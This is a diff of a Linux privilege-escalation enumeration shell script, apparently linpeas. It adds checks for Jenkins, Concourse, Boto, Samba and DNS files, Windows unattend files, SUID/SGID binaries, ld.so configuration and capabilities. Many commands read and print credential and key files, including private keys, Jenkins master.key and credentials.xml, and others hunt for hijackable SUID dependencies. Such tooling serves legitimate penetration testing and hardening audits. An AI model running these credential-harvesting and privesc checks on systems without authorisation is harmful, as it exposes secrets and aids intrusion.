] || [ "$DEBUG" ]; then + print_2title "Analyzing Concourse Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"\.flyrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".flyrc"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "\.flyrc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.flyrc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,token:*|value:.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"concourse-auth$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "concourse-auth"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "concourse-auth$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,concourse-auth$,${SED_RED},"; find "$f" -name "host-key" | while read ff; do ls -ld "$ff" | sed -${E} "s,host-key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,RSA PRIVATE KEY,${SED_RED},g"; done; echo "";find "$f" -name "local-users" | while read ff; do ls -ld "$ff" | sed -${E} "s,local-users,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "session-signing-key" | while read ff; do ls -ld "$ff" | sed -${E} "s,session-signing-key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "worker-key-pub" | while read ff; do ls -ld "$ff" | sed -${E} "s,worker-key-pub,${SED_RED},"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_CONCOURSE\" | grep -E \"concourse-keys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "concourse-keys"; fi; fi; printf "%s" "$PSTORAGE_CONCOURSE" | grep -E "concourse-keys$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,concourse-keys$,${SED_RED},"; find "$f" -name "host_key" | while read ff; do ls -ld "$ff" | sed -${E} "s,host_key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,RSA PRIVATE KEY,${SED_RED},g"; done; echo "";find "$f" -name "session_signing_key" | while read ff; do ls -ld "$ff" | sed -${E} "s,session_signing_key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "worker_key.pub" | while read ff; do ls -ld "$ff" | sed -${E} "s,worker_key.pub,${SED_RED},"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_BOTO" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Boto Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BOTO\" | grep -E \"\.boto$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".boto"; fi; fi; printf "%s" "$PSTORAGE_BOTO" | grep -E "\.boto$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.boto$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + if [ "$PSTORAGE_INFLUXDB" ] || [ "$DEBUG" ]; then print_2title "Analyzing InfluxDB Files (limit 70)" if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo ""; @@ -4056,9 +4509,16 @@ if [ "$PSTORAGE_PASS_STORE_DIRECTORIES" ] || [ "$DEBUG" ]; then fi -if [ "$PSTORAGE_BIND" ] || [ "$DEBUG" ]; then - print_2title "Analyzing Bind Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +if [ "$PSTORAGE_SAMBA" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Samba Files (limit 70)" + smbstatus 2>/dev/null + if ! [ "`echo \"$PSTORAGE_SAMBA\" | grep -E \"smb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "smb.conf"; fi; fi; printf "%s" "$PSTORAGE_SAMBA" | grep -E "smb\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,smb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "browseable|read only|writable|guest ok|enable privileges|create mask|directory mask|logon script|magic script|magic output" | sed -${E} "s,browseable.*yes|read only.*no|writable.*yes|guest ok.*yes|enable privileges.*yes|create mask.*|directory mask.*|logon script.*|magic script.*|magic output.*,${SED_RED},g" | sed -${E} "s,browseable.*no|read only.*yes|writable.*no|guest ok.*no|enable privileges.*no,${SED_GOOD},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_DNS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing DNS Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DNS\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_DNS" | grep -E "bind$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";find "$f" -name "named.conf*" | while read ff; do ls -ld "$ff" | sed -${E} "s,named.conf.*,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#|//" | sed -${E} "s,allow-query|allow-recursion|allow-transfer|zone-statistics|file .*,${SED_RED},g"; done; echo "";done; echo ""; fi @@ -4111,6 +4571,16 @@ if [ "$PSTORAGE_JETTY" ] || [ "$DEBUG" ]; then fi +if [ "$PSTORAGE_JENKINS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Jenkins Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"master\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "master.key"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "master\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,master\.key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"hudson\.util\.Secret$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hudson.util.Secret"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "hudson\.util\.Secret$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,hudson\.util\.Secret$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"credentials\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "credentials.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "credentials\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,credentials\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"config\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "config.xml"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "config\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,config\.xml$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_JENKINS\" | grep -E \"jenkins$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*jenkins"; fi; fi; printf "%s" "$PSTORAGE_JENKINS" | grep -E "jenkins$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,jenkins$,${SED_RED},"; find "$f" -name "build.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,build.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "secret.*|password.*" | sed -${E} "s,secret.*|password.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + if [ "$PSTORAGE_INTERESTING_LOGS" ] || [ "$DEBUG" ]; then @@ -4122,9 +4592,9 @@ fi if [ "$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then print_2title "Analyzing Windows Files (limit 70)" - if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"\.rdg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "\.rdg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"autounattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "autounattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "autounattend\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,autounattend\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; @@ -4163,6 +4633,7 @@ if [ "$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "system\.sav$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; @@ -4171,6 +4642,7 @@ if [ "$PSTORAGE_WINDOWS" ] || [ "$DEBUG" ]; then if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "web.*\.config$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "winscp\.ini$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wsl\.exe$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"plum\.sqlite$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "plum.sqlite"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "plum\.sqlite$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,plum\.sqlite$,${SED_RED},"; done; echo ""; fi @@ -4207,10 +4679,10 @@ echo '' echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi -if echo $CHECKS | grep -q interesting_files; then -print_title "Interesting Files" +if echo $CHECKS | grep -q interesting_perms_files; then +print_title "Files with Interesting Permissions" ########################################### -#----------) Interesting files (----------# +#-) Files with Interesting Permissions (-# ########################################### check_critial_root_path(){ @@ -4223,7 +4695,7 @@ check_critial_root_path(){ -##-- IF) SUID +##-- IPF) SUID print_2title "SUID - Check easy privesc, exploits and write perms" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" if ! [ "$STRINGS" ]; then @@ -4235,15 +4707,15 @@ fi suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) for s in $suids_files; do s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + # If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if echo "$s" | grep -qE "^total"; then break; fi sname="$(echo $s | awk '{print $9}')" if [ "$sname" = "." ] || [ "$sname" = ".." ]; then - true #Don't do nothing + true # Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits) echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" @@ -4260,22 +4732,36 @@ for s in $suids_files; do else echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do - sline_first="$(echo "$sline" | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + if ! [ "$FAST" ]; then + + if [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then # Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi fi fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + done + fi + + if [ "$LDD" ] || [ "$READELF" ]; then + echo "$ITALIC --- Checking for writable dependencies of $sname...$NC" + fi + if [ "$LDD" ]; then + "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + if [ "$READELF" ]; then + "$READELF" -d "$sname" | grep PATH | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + + if [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then printf $ITALIC echo "----------------------------------------------------------------------------------------" echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." @@ -4287,6 +4773,7 @@ for s in $suids_files; do echo "----------------------------------------------------------------------------------------" echo "" fi + fi fi fi @@ -4295,13 +4782,13 @@ done; echo "" -##-- IF) SGID +##-- IPF) SGID print_2title "SGID" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid" sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null) for s in $sgids_files; do s=$(ls -lahtr "$s") - #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + # If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder if echo "$s" | grep -qE "^total";then break; fi sname="$(echo $s | awk '{print $9}')" @@ -4309,7 +4796,7 @@ for s in $sgids_files; do true #Don't do nothing elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," - elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then # If write permision, win found (no check exploits) echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," else c="a" @@ -4326,28 +4813,43 @@ for s in $sgids_files; do else echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," printf $ITALIC - if ! [ "$FAST" ] && [ "$STRINGS" ]; then - $STRINGS "$sname" | sort | uniq | while read sline; do - sline_first="$(echo $sline | cut -d ' ' -f1)" - if echo "$sline_first" | grep -qEv "$cfuncs"; then - if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path - if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" - fi - else #If not a path - if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary - printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + if ! [ "$FAST" ]; then + + if [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then # If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then # And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else # If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then # Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi fi fi - fi - done - if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + done + fi + + if [ "$LDD" ] || [ "$READELF" ]; then + echo "$ITALIC --- Checking for writable dependencies of $sname...$NC" + fi + if [ "$LDD" ]; then + "$LDD" "$sname" | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + if [ "$READELF" ]; then + "$READELF" -d "$sname" | grep PATH | grep -E "$Wfolders" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + fi + + if [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then printf "$ITALIC" echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" printf "$NC" echo "" fi + fi fi fi @@ -4355,45 +4857,109 @@ for s in $sgids_files; do done; echo "" -##-- IF) Misconfigured ld.so +##-- IPF) Misconfigured ld.so if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld.so" + if [ -f "/etc/ld.so.conf" ] && [ -w "/etc/ld.so.conf" ]; then + echo "You have write privileges over /etc/ld.so.conf" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED$ITALIC"/etc/ld.so.conf\n"$NC; + else + printf $GREEN$ITALIC"/etc/ld.so.conf\n"$NC; + fi + + echo "Content of /etc/ld.so.conf:" cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + + # Check each configured folder cat /etc/ld.so.conf 2>/dev/null | while read l; do if echo "$l" | grep -q include; then ini_path=$(echo "$l" | cut -d " " -f 2) fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + + if [ -d "/etc/ld.so.conf" ] && [ -w "$fpath" ]; then + echo "You have write privileges over $fpath" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC"$fpath\n"$NC; + else + printf $GREEN$ITALIC"$fpath\n"$NC; + fi + + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then + echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + if [ -w "$f" ]; then + echo "You have write privileges over $f" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC"$f\n"$NC; + else + printf $GREEN$ITALIC" $f\n"$NC; + fi + + cat "$f" | grep -v "^#" | while read l2; do + if [ -f "$l2" ] && [ -w "$l2" ]; then + echo "You have write privileges over $l2" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + printf $RED_YELLOW$ITALIC" - $l2\n"$NC; + else + echo $ITALIC" - $l2"$NC | sed -${E} "s,$l2,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"; + fi + done done fi done echo "" + + + if [ -f "/etc/ld.so.preload" ] && [ -w "/etc/ld.so.preload" ]; then + echo "You have write privileges over /etc/ld.so.preload" | sed -${E} "s,.*,${SED_RED_YELLOW},"; + else + printf $ITALIC$GREEN"/etc/ld.so.preload\n"$NC; + fi + cat /etc/ld.so.preload 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat /etc/ld.so.preload 2>/dev/null | while read l; do + if [ -f "$l" ] && [ -w "$l" ]; then echo "You have write privileges over $l" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + done + fi -##-- IF) Capabilities +##-- IPF) Capabilities if ! [ "$SEARCH_IN_FOLDER" ]; then print_2title "Capabilities" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities" if [ "$(command -v capsh)" ]; then - echo "Current env capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - echo "Current proc capabilities:" + + print_3title "Current shell capabilities" + cat "/proc/$$/status" | grep Cap | while read -r cap_line; do + cap_name=$(echo "$cap_line" | awk '{print $1}') + cap_value=$(echo "$cap_line" | awk '{print $2}') + if [ "$cap_name" = "CapEff:" ]; then + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED_YELLOW},")" + else + echo "$cap_name $(capsh --decode=0x"$cap_value" | sed -${E} "s,$capsB,${SED_RED},")" + fi + done + echo "" + + print_3title "Parent process capabilities" + cat "/proc/$PPID/status" | grep Cap | while read -r cap_line; do + cap_name=$(echo "$cap_line" | awk '{print $1}') + 